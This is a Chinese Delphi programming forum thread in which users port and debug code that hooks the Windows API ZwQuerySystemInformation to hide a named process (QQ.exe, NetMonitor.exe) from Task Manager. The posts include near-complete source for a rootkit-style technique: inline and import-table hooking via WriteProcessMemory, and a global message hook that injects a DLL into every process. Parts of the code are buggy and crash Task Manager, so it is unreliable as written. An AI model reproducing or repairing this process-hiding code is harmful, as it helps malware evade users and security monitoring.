VC to delphi!!! ( 积分: 40 )

  • 主题发起人 主题发起人 doglive
  • 开始时间 开始时间
D

doglive

Unregistered / Unconfirmed
GUEST, unregistred user!
谁能帮我把VC转为DELPHI !转了很久都没有成功!
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters; //windows 2000 only
struct _SYSTEM_THREADS Threads[1];
};
//用户自定义的NewZwQuerySystemInformation
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{
int bMod = FALSE;
ANSI_STRING process_name;
RtlUnicodeStringToAnsiString( &process_name, &(curr->ProcessName), TRUE);
if( (0 < process_name.Length) && (255 > process_name.Length) )
{
if(0 == memcmp( process_name.Buffer, "QQ.exe", 6)) //修改成你要隐藏的程序
{
if(prev)
{
if(curr->NextEntryDelta)
{
prev->NextEntryDelta += curr->NextEntryDelta;
bMod = TRUE; }
else
{
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
// we are the only process!
SystemInformation = NULL;
}
}
}
 
呵呵,不过是Hook Native API ZwQuerySystemInformation隐藏进程而已.随便找一下都可以找到一大把现成的Delphi代码
 
program process_seeker;

{$APPTYPE CONSOLE}

uses
SysUtils, windows, tintlist;

type
NTStatus = cardinal;
PVOID = pointer;
USHORT = WORD;
UCHAR = byte;
PWSTR = PWideChar;

CONST //Статус константы

STATUS_SUCCESS = NTStatus($00000000);
STATUS_ACCESS_DENIED = NTStatus($C0000022);
STATUS_INFO_LENGTH_MISMATCH = NTStatus($C0000004);

const SystemProcessesAndThreadsInformation = 5;

type
PClientID = ^TClientID;
TClientID = packed record

UniqueProcess:cardinal;
UniqueThread:cardinal;
end;

PUnicodeString = ^TUnicodeString;
TUnicodeString = packed record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;

PVM_COUNTERS = ^VM_COUNTERS;
VM_COUNTERS = packed record
PeakVirtualSize,
VirtualSize,
PageFaultCount,
PeakWorkingSetSize,
WorkingSetSize,
QuotaPeakPagedPoolUsage,
QuotaPagedPoolUsage,
QuotaPeakNonPagedPoolUsage,
QuotaNonPagedPoolUsage,
PagefileUsage,
PeakPagefileUsage: dword;
end;

PIO_COUNTERS = ^IO_COUNTERS;
IO_COUNTERS = packed record

ReadOperationCount,
WriteOperationCount,
OtherOperationCount,
ReadTransferCount,
WriteTransferCount,
OtherTransferCount: LARGE_INTEGER;
end;

PSYSTEM_THREADS = ^SYSTEM_THREADS;
SYSTEM_THREADS = packed record
KernelTime,
UserTime,
CreateTime: LARGE_INTEGER;
WaitTime: dword;
StartAddress: pointer;
ClientId: TClientId;
Priority,
BasePriority,
ContextSwitchCount: dword;
State: dword;
WaitReason: dword;
end;

PSYSTEM_PROCESSES = ^SYSTEM_PROCESSES;
SYSTEM_PROCESSES = packed record
NextEntryDelta,
ThreadCount: dword;
Reserved1 : array [0..5] of dword;
CreateTime,
UserTime,
KernelTime: LARGE_INTEGER;
ProcessName: TUnicodeString;
BasePriority: dword;
ProcessId,
InheritedFromProcessId,
HandleCount: dword;
Reserved2: array [0..1] of dword;
VmCounters: VM_COUNTERS;
IoCounters: IO_COUNTERS; // Windows 2000 only

Threads: array [0..0] of SYSTEM_THREADS;
end;

Function ZwQuerySystemInformation(ASystemInformationClass: dword;
ASystemInformation: Pointer;
ASystemInformationLength: dword;
AReturnLength:PCardinal): NTStatus;
stdcall;external 'ntdll.dll';


{ Получение буфера с системной информацией }
Function GetInfoTable(ATableType:dword):Pointer;
var
mSize: dword;
mPtr: pointer;
St: NTStatus;
begin
Result := nil;
mSize := $4000; //начальный размер буфера

repeat
mPtr := VirtualAlloc(nil, mSize, MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE);
if mPtr = nil then Exit;
St := ZwQuerySystemInformation(ATableType, mPtr, mSize, nil);
if St = STATUS_INFO_LENGTH_MISMATCH then

begin //надо больше памяти
VirtualFree(mPtr, 0, MEM_RELEASE);
mSize := mSize * 2;
end;
until St <> STATUS_INFO_LENGTH_MISMATCH;
if St = STATUS_SUCCESS
then Result := mPtr
else VirtualFree(mPtr, 0, MEM_RELEASE);

end;

var info, info2: PSystem_Processes;
i, j, k: integer;
t, t1: LARGE_INTEGER;
process_id: tintegerlist;
begin
process_id := TIntegerList.Create;

//СОЗДАЕМ СПИСОК ПРОЦЕССОВ НА МОМЕНТ СОЗДАНИЯ НАШЕГО ПРОЦЕССА
info := GetInfoTable(SystemProcessesAndThreadsInformation);
info2 := info;

while (info2^.NextEntryDelta <> 0) do

begin
if (process_id.IndexOf(info2^.ProcessId)=-1)
then process_id.Add(info2^.ProcessId);

info2 := Pointer(dword(info2)+info2^.NextEntryDelta);
end;

VirtualFree(info, 0, MEM_RELEASE);

//А теперь смотрим что добавилось

while true do
begin
Sleep(200);
info := GetInfoTable(SystemProcessesAndThreadsInformation);
info2 := info;

while (info2^.NextEntryDelta <> 0) do

begin
if (process_id.IndexOf(info2^.ProcessId)=-1)
then
begin
writeln(info2^.ProcessId, ' - created');
process_id.Add(info2^.ProcessId);
end;
info2 := Pointer(dword(info2)+info2^.NextEntryDelta);
end;
VirtualFree(info, 0, MEM_RELEASE);
end;

end.
 
帮我看看问题出在哪里?运行后,,任务管理器发生错误!
unit UHookType;

interface
uses
Windows, aclapi, Accctrl;

type
ULONG = DWORD;
PULONG = ^ULONG;

USHORT = Word;
PWSTR = PWideChar;
NTSTATUS = cardinal;
ACCESS_MASK = ULONG;

CONST

STATUS_SUCCESS = NTStatus($00000000);
STATUS_ACCESS_DENIED = NTStatus($C0000022);
STATUS_INFO_LENGTH_MISMATCH = NTStatus($C0000004);
type
PClientID = ^TClientID;
TClientID = packed record

UniqueProcess:cardinal;
UniqueThread:cardinal;
end;

type
_SYSTEM_INFORMATION_CLASS = DWORD;
SYSTEM_INFORMATION_CLASS = _SYSTEM_INFORMATION_CLASS;
type
PUNICODE_STRING = ^UNICODE_STRING;
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;
type VM_COUNTERS = record
PeakVirtualSize: ULONG; // //虚拟存储峰值大小;
VirtualSize: ULONG; ////虚拟存储大小;
PageFaultCount: ULONG; // //页故障数目;
PeakWorkingSetSize: ULONG; // //工作集峰值大小;
WorkingSetSize:ULONG; // //工作集大小;
QuotaPeakPagedPoolUsage: ULONG; // //分页池使用配额峰值;
QuotaPagedPoolUsage: ULONG; // //分页池使用配额;
QuotaPeakNonPagedPoolUsage: ULONG; // //非分页池使用配额峰值;
QuotaNonPagedPoolUsage: ULONG; // //非分页池使用配额;
PagefileUsage: ULONG; // //页文件使用情况;
PeakPagefileUsage: ULONG; //
end;
type IO_COUNTERS = Record
ReadOperationCount: LARGE_INTEGER; //I/O读操作数目;
WriteOperationCount: LARGE_INTEGER; //I/O写操作数目;
OtherOperationCount: LARGE_INTEGER; //I/O其他操作数目;
ReadTransferCount: LARGE_INTEGER; //I/O读数据数目;
WriteTransferCount: LARGE_INTEGER; //I/O写数据数目;
OtherTransferCount: LARGE_INTEGER; //I/O其他操作数据数目;
end;
type struct_SYSTEM_THREADS = Record
KernelTime: LARGE_INTEGER; //CPU内核模式使用时间;
UserTime: LARGE_INTEGER; //CPU用户模式使用时间;
CreateTime: LARGE_INTEGER; //线程创建时间;
WaitTime: ULONG;//等待时间;
StartAddress: pointer;//线程开始的虚拟地址;
ClientId: TClientId; //线程标识符;
Priority: ULONG; //线程优先级;
BasePriority: ULONG; //基本优先级;
THREADSTATE : ULONG;//当前状态;
WaitReason: DWORD;//等待原因;
ContextSwitchCount: ULONG //

end;
type
_SYSTEM_PROCESSES=Record
NextEntryDelta:ULONG;
ThreadCount:ULONG;
Reserved: array[0..5] of ULONG;
CreateTime: LARGE_INTEGER;
UserTime: LARGE_INTEGER;
KernelTime: LARGE_INTEGER;
ProcessName: UNICODE_STRING;
BasePriority: ULONG;
ProcessId: ULONG ;
InheritedFromProcessId: ULONG;
HandleCount: ULONG ;
Reserved2: array[0..1] of ULONG ;
VmCounters: VM_COUNTERS;
IoCounters: IO_COUNTERS;
Threads: array[0..0] of struct_SYSTEM_THREADS;
end;
type
_SYSTEM_HANDLE_INFORMATION = record
ProcessId: ULONG;
ObjectTypeNumber: UCHAR;
Flags: UCHAR;
Handle: USHORT;
_Object: pointer;
GrantedAccess: ACCESS_MASK;
end;
SYSTEM_HANDLE_INFORMATION = _SYSTEM_HANDLE_INFORMATION;
PSYSTEM_HANDLE_INFORMATION = ^_SYSTEM_HANDLE_INFORMATION;

TRtlUnicodeStringToAnsiString = procedure(DestinationString: PUNICODE_STRING;SourceString: PUNICODE_STRING;Flag: Boolean); stdcall;
TRTLNTSTATUSTODOSERROR = function(Status: NTSTATUS): ULONG; stdcall;
TZWQUERYSYSTEMINFORMATION = function(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation:
Pointer; SystemInformationLength: ULONG; ReturnLength: PCardinal): NTSTATUS; stdcall;

implementation

end.
unit UnitNt2000Hook;

interface

uses classes, Windows,SysUtils, messages,dialogs;

type
TImportCode = packed record
JumpInstruction: Word;
AddressOfPointerToFunction: PPointer;
end;
PImage_Import_Entry = ^Image_Import_Entry;
Image_Import_Entry = record
Characteristics: DWORD;
TimeDateStamp: DWORD;
MajorVersion: Word;
MinorVersion: Word;
Name: DWORD;
LookupTable: DWORD;
end;
PImportCode = ^TImportCode;
TLongJmp = packed record
JmpCode: ShortInt; {指令,用$E9来代替系统的指令}
FuncAddr: DWORD; {函数地址}
end;

THookClass = class
private
Trap:boolean; {调用方式:True陷阱式,False改引入表式}
hProcess: Cardinal; {进程句柄,只用于陷阱式}
AlreadyHook:boolean; {是否已安装Hook,只用于陷阱式}
AllowChange:boolean; {是否允许安装、卸载Hook,只用于改引入表式}
Oldcode: array[0..4]of byte; {系统函数原来的前5个字节}
Newcode: TLongJmp; {将要写在系统函数的前5个字节}
private
public
OldFunction,NewFunction:Pointer;{被截函数、自定义函数}
constructor Create(IsTrap:boolean;OldFun,NewFun:pointer);
constructor Destroy;
procedure Restore;
procedure Change;
published
end;

implementation

{取函数的实际地址。如果函数的第一个指令是Jmp,则取出它的跳转地址(实际地址),这往往是由于程序中含有Debug调试信息引起的}
function FinalFunctionAddress(Code: Pointer): Pointer;
Var
func: PImportCode;
begin
Result:=Code;
if Code=nil then exit;
try
func:=code;
if (func.JumpInstruction=$25FF) then
{指令二进制码FF 25 汇编指令jmp [...]}
Func:=func.AddressOfPointerToFunction^;
result:=Func;
except
Result:=nil;
end;
end;

{更改引入表中指定函数的地址,只用于改引入表式}
function PatchAddressInModule(BeenDone:Tlist;hModule: THandle; OldFunc,NewFunc: Pointer):integer;
const
SIZE=4;
Var
Dos: PImageDosHeader;
NT: PImageNTHeaders;
ImportDesc: PImage_Import_Entry;
rva: DWORD;
Func: PPointer;
DLL: String;
f: Pointer;
written: DWORD;
mbi_thunk:TMemoryBasicInformation;
dwOldProtect:DWORD;
begin
Result:=0;
if hModule=0 then exit;
Dos:=Pointer(hModule);
{如果这个DLL模块已经处理过,则退出。BeenDone包含已处理的DLL模块}
if BeenDone.IndexOf(Dos)>=0 then exit;
BeenDone.Add(Dos);{把DLL模块名加入BeenDone}
OldFunc:=FinalFunctionAddress(OldFunc);{取函数的实际地址}

{如果这个DLL模块的地址不能访问,则退出}
if IsBadReadPtr(Dos,SizeOf(TImageDosHeader)) then exit;
{如果这个模块不是以'MZ'开头,表明不是DLL,则退出}
if Dos.e_magic<>IMAGE_DOS_SIGNATURE then exit;{IMAGE_DOS_SIGNATURE='MZ'}

{定位至NT Header}
NT :=Pointer(Integer(Dos) + dos._lfanew);
{定位至引入函数表}
RVA:=NT^.OptionalHeader.
DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
if RVA=0 then exit;{如果引入函数表为空,则退出}
{把函数引入表的相对地址RVA转换为绝对地址}
ImportDesc := pointer(DWORD(Dos)+RVA);{Dos是此DLL模块的首地址}

{遍历所有被引入的下级DLL模块}
While (ImportDesc^.Name<>0) do
begin
{被引入的下级DLL模块名字}
DLL:=PChar(DWORD(Dos)+ImportDesc^.Name);
{把被导入的下级DLL模块当做当前模块,进行递归调用}
PatchAddressInModule(BeenDone,GetModuleHandle(PChar(DLL)),OldFunc,NewFunc);

{定位至被引入的下级DLL模块的函数表}
Func:=Pointer(DWORD(DOS)+ImportDesc.LookupTable);
{遍历被引入的下级DLL模块的所有函数}
While Func^<>nil do
begin
f:=FinalFunctionAddress(Func^);{取实际地址}
if f=OldFunc then {如果函数实际地址就是所要找的地址}
begin
VirtualQuery(Func,mbi_thunk, sizeof(TMemoryBasicInformation));
VirtualProtect(Func,SIZE,PAGE_EXECUTE_WRITECOPY,mbi_thunk.Protect);{更改内存属性}
WriteProcessMemory(GetCurrentProcess,Func,@NewFunc,SIZE,written);{把新函数地址覆盖它}
VirtualProtect(Func, SIZE, mbi_thunk.Protect,dwOldProtect);{恢复内存属性}
end;
If Written=4 then Inc(Result);
// else showmessagefmt('error:%d',[Written]);
Inc(Func);{下一个功能函数}
end;
Inc(ImportDesc);{下一个被引入的下级DLL模块}
end;
end;

{HOOK的入口,其中IsTrap表示是否采用陷阱式}
constructor THookClass.Create(IsTrap:boolean;OldFun,NewFun:pointer);
begin
{求被截函数、自定义函数的实际地址}
OldFunction:=FinalFunctionAddress(OldFun);
NewFunction:=FinalFunctionAddress(NewFun);

Trap:=IsTrap;
if Trap then{如果是陷阱式}
begin
{以特权的方式来打开当前进程}
hProcess := OpenProcess(PROCESS_ALL_ACCESS,FALSE, GetCurrentProcessID);
{生成jmp xxxx的代码,共5字节}
Newcode.JmpCode := ShortInt($E9); {jmp指令的十六进制代码是E9}
NewCode.FuncAddr := DWORD(NewFunction) - DWORD(OldFunction) - 5;
{保存被截函数的前5个字节}
move(OldFunction^,OldCode,5);
{设置为还没有开始HOOK}
AlreadyHook:=false;
end;
{如果是改引入表式,将允许HOOK}
if not Trap then AllowChange:=true;
Change; {开始HOOK}
{如果是改引入表式,将暂时不允许HOOK}
if not Trap then AllowChange:=false;
end;

{HOOK的出口}
constructor THookClass.Destroy;
begin
{如果是改引入表式,将允许HOOK}
if not Trap then AllowChange:=true;
Restore; {停止HOOK}
if Trap then{如果是陷阱式}
CloseHandle(hProcess);
end;

{开始HOOK}
procedure THookClass.Change;
var
nCount: DWORD;
BeenDone: TList;
begin
if Trap then{如果是陷阱式}
begin
if (AlreadyHook)or (hProcess = 0) or (OldFunction = nil) or (NewFunction = nil) then
exit;
AlreadyHook:=true;{表示已经HOOK}
WriteProcessMemory(hProcess, OldFunction, @(Newcode), 5, nCount);
end
else begin{如果是改引入表式}
if (not AllowChange)or(OldFunction=nil)or(NewFunction=nil)then exit;
BeenDone:=TList.Create; {用于存放当前进程所有DLL模块的名字}
try
PatchAddressInModule(BeenDone,GetModuleHandle(nil),OldFunction,NewFunction);
finally
BeenDone.Free;
end;
end;
end;

{恢复系统函数的调用}
procedure THookClass.Restore;
var
nCount: DWORD;
BeenDone: TList;
begin
if Trap then{如果是陷阱式}
begin
if (not AlreadyHook) or (hProcess = 0) or (OldFunction = nil) or (NewFunction = nil) then
exit;
WriteProcessMemory(hProcess, OldFunction, @(Oldcode), 5, nCount);
AlreadyHook:=false;{表示退出HOOK}
end
else begin{如果是改引入表式}
if (not AllowChange)or(OldFunction=nil)or(NewFunction=nil)then exit;
BeenDone:=TList.Create;{用于存放当前进程所有DLL模块的名字}
try
PatchAddressInModule(BeenDone,GetModuleHandle(nil),NewFunction,OldFunction);
finally
BeenDone.Free;
end;
end;
end;

end.
//*****HOOK API 函数,用来隐藏进程*****//
unit UHook_;

interface

uses Windows,UnitNt2000Hook,UHookType,SysUtils,StdCtrls ;

procedure StartHook;stdcall;
procedure StopHook;stdcall;

implementation

var MessageHook : THandle=0 ;
Hook_SysInfor : THookClass ;
ZwQuerySystemInformation: TZWQUERYSYSTEMINFORMATION = nil;
ntdll_dll: HMODULE;
RtlUnicodeStringToAnsiString: TRtlUnicodeStringToAnsiString = nil;

//******消息勾字处理函数******//
function GetMsgProc(code: integer; wPar: integer; lPar: integer): integer;stdcall;
begin
Result := 0;
end;

//*****开始HOOK,建立消息钩子,将本进程注入到其他进程空间*****//
procedure StartHook;stdcall;
begin
if MessageHook=0 then
MessageHook := SetwindowsHookEx(WH_GETMESSAGE,GetMsgProc,HInstance,0) ;
end;

//*****结束HOOK*****//
procedure StopHook;stdcall;
begin
if MessageHook<>0 then
UnHookWindowsHookEx(MessageHook) ;
end;

//*****自定义的ZwQuerySystemInformation 函数*****//
function NewZwQuerySystemInformation(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation:
Pointer; SystemInformationLength: ULONG; ReturnLength: PCardinal): NTSTATUS; stdcall;
type P_SYSTEM_PROCESSES = ^_SYSTEM_PROCESSES ;
var cur , pre : P_SYSTEM_PROCESSES;
var bMod : boolean ;
var g_hNtDLL : Thandle ;
var process_name : UNICODE_STRING;
begin
g_hNtDLL := LoadLibrary('ntdll.dll');
RtlUnicodeStringToAnsiString := GetProcAddress(g_hNtDLL, 'RtlUnicodeStringToAnsiString');
Hook_SysInfor.Restore ;
//ZwQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
if SystemInformationClass =5 then
begin
cur := P_SYSTEM_PROCESSES(SystemInformation) ;
pre := Nil ;
while (cur<>nil) do
begin
bMod := FALSE;
RtlUnicodeStringToAnsiString(@process_name,@(cur^.ProcessName),TRUE);
if process_name.Buffer='NetMonitor.exe' then
begin
if pre<>nil then
begin
if cur^.NextEntryDelta<>0 then
begin
pre^.NextEntryDelta :=pre^.NextEntryDelta + cur^.NextEntryDelta;
bMod := TRUE;
end
else
begin
pre^.NextEntryDelta := 0;
end
end
else
begin
if(cur^.NextEntryDelta<>0) then
begin
DWORD(SystemInformation) := DWORD(SystemInformation) + cur^.NextEntryDelta;
end
else
begin
// we are the only process!
SystemInformation := Nil;
end
end
end;
//RtlFreeAnsiString(&process_name);
pre := cur;
if not bMod then
pre := cur;
if(cur^.NextEntryDelta<>0) then
DWORD(cur) :=+ cur^.NextEntryDelta
else cur := nil ;
end;

end;
Hook_SysInfor.Change ;
end;

initialization
ntdll_dll := GetModuleHandle('ntdll.dll');
@ZwQuerySystemInformation := GetProcAddress(ntdll_dll, 'ZwQuerySystemInformation');
Hook_SysInfor := THookClass.Create(True,@ZwQuerySystemInformation,@NewZwQuerySystemInformation) ;

finalization
Hook_SysInfor.Destroy ;

end.
 
后退
顶部